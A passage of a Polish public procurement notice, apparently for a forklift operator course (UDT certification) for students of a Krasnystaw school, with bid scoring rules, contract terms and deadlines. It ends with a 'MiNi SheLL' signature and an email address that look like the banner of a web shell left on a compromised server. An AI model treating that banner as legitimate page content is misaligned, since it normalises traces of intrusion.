class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">I. Punkty za kryterium „Cena” zostaną obliczone według wzoru:<br/><br/> Cn<br/>PC = ------- x 60 pkt<br/> Cb<br/>	gdzie,<br/>	PC - ilość punktów za kryterium cena,<br/>	Cn - najniższa cena ofertowa spośród ofert nieodrzuconych,<br/>	Cb – cena oferty badanej.<br/>W kryterium „Cena”, oferta z najniższą ceną otrzyma 60 punktów a pozostałe oferty po matematycznym przeliczeniu w odniesieniu do najniższej ceny odpowiednio mniej. Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/><br/>Kryterium „Termin rozpoczęcia realizacji usługi (Pt)”.<br/><br/>Punkty za kryterium „Termin rozpoczęcia realizacji usługi” zostaną przyznane w następujący sposób:<br/><br/>•	rozpoczęcie realizacji usługi w terminie do 7 dni od podpisania umowy – 40 pkt<br/>•	rozpoczęcie realizacji usługi w terminie do 14 dni od podpisania umowy – 30 pkt<br/>•	rozpoczęcie realizacji usługi w terminie do 21 dni od podpisania umowy – 20 pkt<br/>•	rozpoczęcie realizacji usługi w terminie do 28 dni od podpisania umowy – 10 pkt<br/>•	rozpoczęcie realizacji usługi powyżej 28 dni od podpisania umowy – 0 pkt<br/><br/>W sytuacji kiedy Wykonawca w formularzu ofertowym nie wskaże terminu realizacji usługi, oferta Wykonawcy w powyższym kryterium otrzyma zero (0) punktów. <br/><br/>Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma największą ilość punktów obliczoną na podstawie wzoru:<br/><br/>Przyznana ilość punktów = PC + Pt<br/>gdzie:<br/>PC - ilość punktów za kryterium „Cena”,<br/>Pt - ilość punktów za kryterium „Termin rozpoczęcia realizacji usługi”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpoczęcia realizacji usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Kurs operatora wózków widłowych z uprawnieniami UDT dla uczniów. <br/>1)	Miejsce realizacji:<br/>Zajęcia teoretyczne: sale wykładowe Zespołu Szkół Nr 2 im. Bartosza Głowackiego w Krasnymstawie, ul. Sobieskiego 5, 22-30 Krasnystaw. <br/>Zajęcia praktyczne: plac manewrowy Zespołu Szkół Nr 2 im. Bartosza Głowackiego w Krasnymstawie, ul. Sobieskiego 5, 22-30 Krasnystaw.<br/>2)	Odbiorca: uczniowie Zespołu Szkół Nr 2 im Bartosza Głowackiego w Krasnymstawie.<br/>3)	Liczba uczestników i czas trwania szkolenia: 2 grupy po 8 osób, czas trwania zgodnie z przepisami prawa. <br/>4)	Maksymalny możliwy termin realizacji: od dnia podpisania umowy do 31 marzec 2022 r. <br/>5)	Wykonawca zobowiązany jest:<br/>g)	przygotować program zajęć;<br/>h)	przygotować materiały szkoleniowe;<br/>i)	skierować kandydatów na badania do lekarza jeżeli wymagane są przepisami prawa (koszt badań ponosi Wykonawca);<br/>j)	zorganizować i przeprowadzić kurs składający się z:<br/>•	zajęć teoretycznych;<br/>•	zajęć praktycznych;<br/>k)	posiadać zaplecze techniczne umożliwiające prawidłowe wykonanie kursu;	<br/>l)	wydać dokument zgodny z obowiązującymi przepisami uprawniający do przystąpienia do egzaminu państwowego;<br/>b)	opłacić i ustalić dla wszystkich uczestników pierwszy termin egzaminu państwowego w ośrodku egzaminowania właściwym z punktu widzenia przeprowadzonych zajęć praktycznych. <br/>6)	W związku z wystąpieniem stanu epidemii Wykonawca zapewnia gotowość do przeprowadzenia kursu w trybie hybrydowym, łączącym tradycyjne metody nauki (bezpośredni kontakt z prowadzącym) z aktywnościami prowadzącymi zdalnie za pomocą komputera (M-learinig).<br/>7)	W związku z wystąpieniem stanu epidemii Wykonawca zapewnia gotowość do przeprowadzenia części teoretycznej kursu w trybie zdalnym (za zgoda Zamawiającego) polegającą na:<br/>g)	zapewnieniu platformy on- line umożliwiającej rejestrowanie przebiegu kursu (minimum widok trenera), prowadzenia testów początkowych/końcowych za pomocą platformy on line lub skanów przesłanych przez Uczestników Projektu,<br/>h)	udokumentowania obecności Uczestników Projektu: w zależności od możliwości platformy mogą to być : raporty z logowania UP, maile z potwierdzeniem odbycia kursu, listy indywidualne w formie skanów przesyłane do Zamawiającego,<br/>i)	uzupełnieniu oryginałów w najszybszym możliwym terminie po ustaniu procedur związanych z COVID-19 oraz niezwłocznego przekazania oryginałów dokumentacji Zamawiającemu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80530000-8 - Usługi szkolenia zawodowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">I. Punkty za kryterium „Cena” zostaną obliczone według wzoru:<br/><br/> Cn<br/>PC = ------- x 60 pkt<br/> Cb<br/>	gdzie,<br/>	PC - ilość punktów za kryterium cena,<br/>	Cn - najniższa cena ofertowa spośród ofert nieodrzuconych,<br/>	Cb – cena oferty badanej.<br/>W kryterium „Cena”, oferta z najniższą ceną otrzyma 60 punktów a pozostałe oferty po matematycznym przeliczeniu w odniesieniu do najniższej ceny odpowiednio mniej. Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/><br/>Kryterium „Termin rozpoczęcia realizacji usługi (Pt)”.<br/><br/>Punkty za kryterium „Termin rozpoczęcia realizacji usługi” zostaną przyznane w następujący sposób:<br/><br/>•	rozpoczęcie realizacji usługi w terminie do 7 dni od podpisania umowy – 40 pkt<br/>•	rozpoczęcie realizacji usługi w terminie do 14 dni od podpisania umowy – 30 pkt<br/>•	rozpoczęcie realizacji usługi w terminie do 21 dni od podpisania umowy – 20 pkt<br/>•	rozpoczęcie realizacji usługi w terminie do 28 dni od podpisania umowy – 10 pkt<br/>•	rozpoczęcie realizacji usługi powyżej 28 dni od podpisania umowy – 0 pkt<br/><br/>W sytuacji kiedy Wykonawca w formularzu ofertowym nie wskaże terminu realizacji usługi, oferta Wykonawcy w powyższym kryterium otrzyma zero (0) punktów. <br/><br/>Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma największą ilość punktów obliczoną na podstawie wzoru:<br/><br/>Przyznana ilość punktów = PC + Pt<br/>gdzie:<br/>PC - ilość punktów za kryterium „Cena”,<br/>Pt - ilość punktów za kryterium „Termin rozpoczęcia realizacji usługi”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin rozpoczęcia realizacji usługi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">nie dotyczy</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> nie dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) oświadczenia o których mowa w pkt. 8.1 SWZ składa z ofertą każdy<br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu<br/>lub kryteriów selekcji.<br/><br/>Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Strony dopuszczają możliwość zmiany umowy jeżeli:<br/>a)	nie jest możliwe zrealizowanie części przedmiotu umowy w związku z zaistnieniem następujących okoliczności:<br/>- zdarzenia losowe wywołane przez czynniki zewnętrzne, których nie można było przewidzieć, zagrażające życiu lub zdrowiu ludzi,<br/>- przyczyn organizacyjnych, <br/>b)	zmiana, nie prowadzi do zmiany charakteru umowy i zostały spełnione łącznie następujące warunki:<br/>­	konieczność zmiany umowy spowodowana jest okolicznościami, których Zamawiający, działając z należytą starannością, nie mógł przewidzieć,<br/>c)	nastąpi zmiana dotychczasowego Wykonawcy umowy wynikająca z :<br/>­	połączenia, podziału, przekształcenia, upadłości, restrukturyzacji lub nabycia dotychczasowego wykonawcy lub jego przedsiębiorstwa, o ile nowy Wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy,<br/>­	przejęcia przez Zamawiającego zobowiązań Wykonawcy względem jego podwykonawców,<br/>3. W przypadku wystąpienia okoliczności, o których mowa w ust. 1 możliwa jest w szczególności zmiana sposobu i terminu wykonywania zamówienia.<br/>4. Okoliczności wymienione w ust. 1 stanowią zamknięty katalog przesłanek do zmian umowy, na które Zamawiający może wyrazić zgodę. Nie stanowią one jednocześnie wiążącej podstawy do wyrażenia takiej zgody. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-08 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-06</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com